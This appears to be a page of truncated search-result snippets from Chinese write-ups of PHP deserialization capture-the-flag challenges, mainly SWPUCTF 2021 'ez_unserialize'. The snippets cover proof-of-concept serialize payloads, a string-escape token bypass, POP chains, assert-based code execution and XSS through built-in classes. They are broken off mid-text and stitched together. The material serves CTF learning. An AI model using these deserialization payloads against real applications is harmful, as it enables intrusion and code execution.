[SWPUCTF 2021 新生赛]ez_unserialize 进入题目,扫描目录,发现robots.txt 访问 构造序列化 <?php class wllm { public $admin = 'admin' ; public $passwd = 'ctf'; } $p = new wllm ; $str = serialize($p); echo $str ; echo urlencode($str) ?> 得到payload O:4:"wllm":2:{s:5:"...
题目:[SWPUCTF 2021 新生赛]ez_unserialize:查看源代码发现有个Disallow,猜一下是不是防止爬虫的,访问一下robots.txt 有个cl45s.php,访问一下看看找到了代码,直接开始审计php代码<?phperror_reporting(0); show_source("cl45s.php");class wllm{public $admin;...
$p){ $this->token=$t; $this->password = $p; } public function login(){ return $this->token===$this->password; } } $ctfshow = unserialize($_GET['ctfshow']); $ctfshow->token=md5(mt_
if(isset($_COOKIE['msg'])){ $msg = unserialize(base64_decode($_COOKIE['msg'])); if($msg->token=='admin'){ echo $flag; } } 很明显,要想得到flag要把token值更改为admin 但是正常反序列化,字符串个数是固定的,$umsg = str_replace('fuck', 'loveU', serialize($msg));但是这里fuck被替...
题目来自[SWPUCTF 2021 新生赛]ez_unserialize <?php error_reporting(0); show_source("cl45s.php"); classwllm{ public$admin; public$passwd; publicfunction__construct(){ $this->admin="user"; $this->passwd="123456"; } publicfunction__destruct(){ ...
[SWPUCTF 2022 新生赛]1z_unserialize hint:WEB 反序列化 标题就只能40个字,这就是本篇最后一道题辣,细细一看这些题真的很简单 这题当然也一样,甚至没有wake_up我哭死,都$a($b);你还不懂他的良苦用心吗 这里我们使用断言函数assert,为什么不用eval呢: ...
[SWPUCTF 2021 新生赛]ez_unserialize 查看源代码想到robots协议 看这个代码比较简单 直接让admin=admin passwd=ctf就行了 poc <?php class wllm { public $admin; public $passwd; } $p = new wllm(); $p->admin = "admin"; $p->passwd = "ctf"; ...
<?php$a=$_GET['yds_is_so_beautiful'];echounserialize($a); 仅看到一个反序列化函数并没有给出需要反序列化的类,这就遇到了一个反序列化但没有POP链的情况,所以只能找到PHP内置类来进行反序列化。又发现有个echo,没得跑了,就是我们刚才演示的利用Error或Exception内置类进行XSS,但是查看一下题目的环境发...
以DASCTF的Ezunserialize为例(字符减少) 从源码中可以看到这是一个POP链的构造, 这里很明显是用C类中的__toString()方法中的file_get_contents()来读取flag.php的源码,然后在B类中存在字符串的拼接操作c=′a′.this->b; 此处的 得到: 而接下来才是考虑反序列化字符串逃逸的问题,可以看到有两个过滤代码,一...
unserialize_max_depth 4096 4096 url_rewriter.hosts no value no value url_rewriter.tags a=href,area=href,frame=src,input=src,form=fakeentry a=href,area=href,frame=src,input=src,form=fakeentry user_agent no value no value tidy Tidy support enabled libTidy Version 5.4.0 DirectiveLocal Value...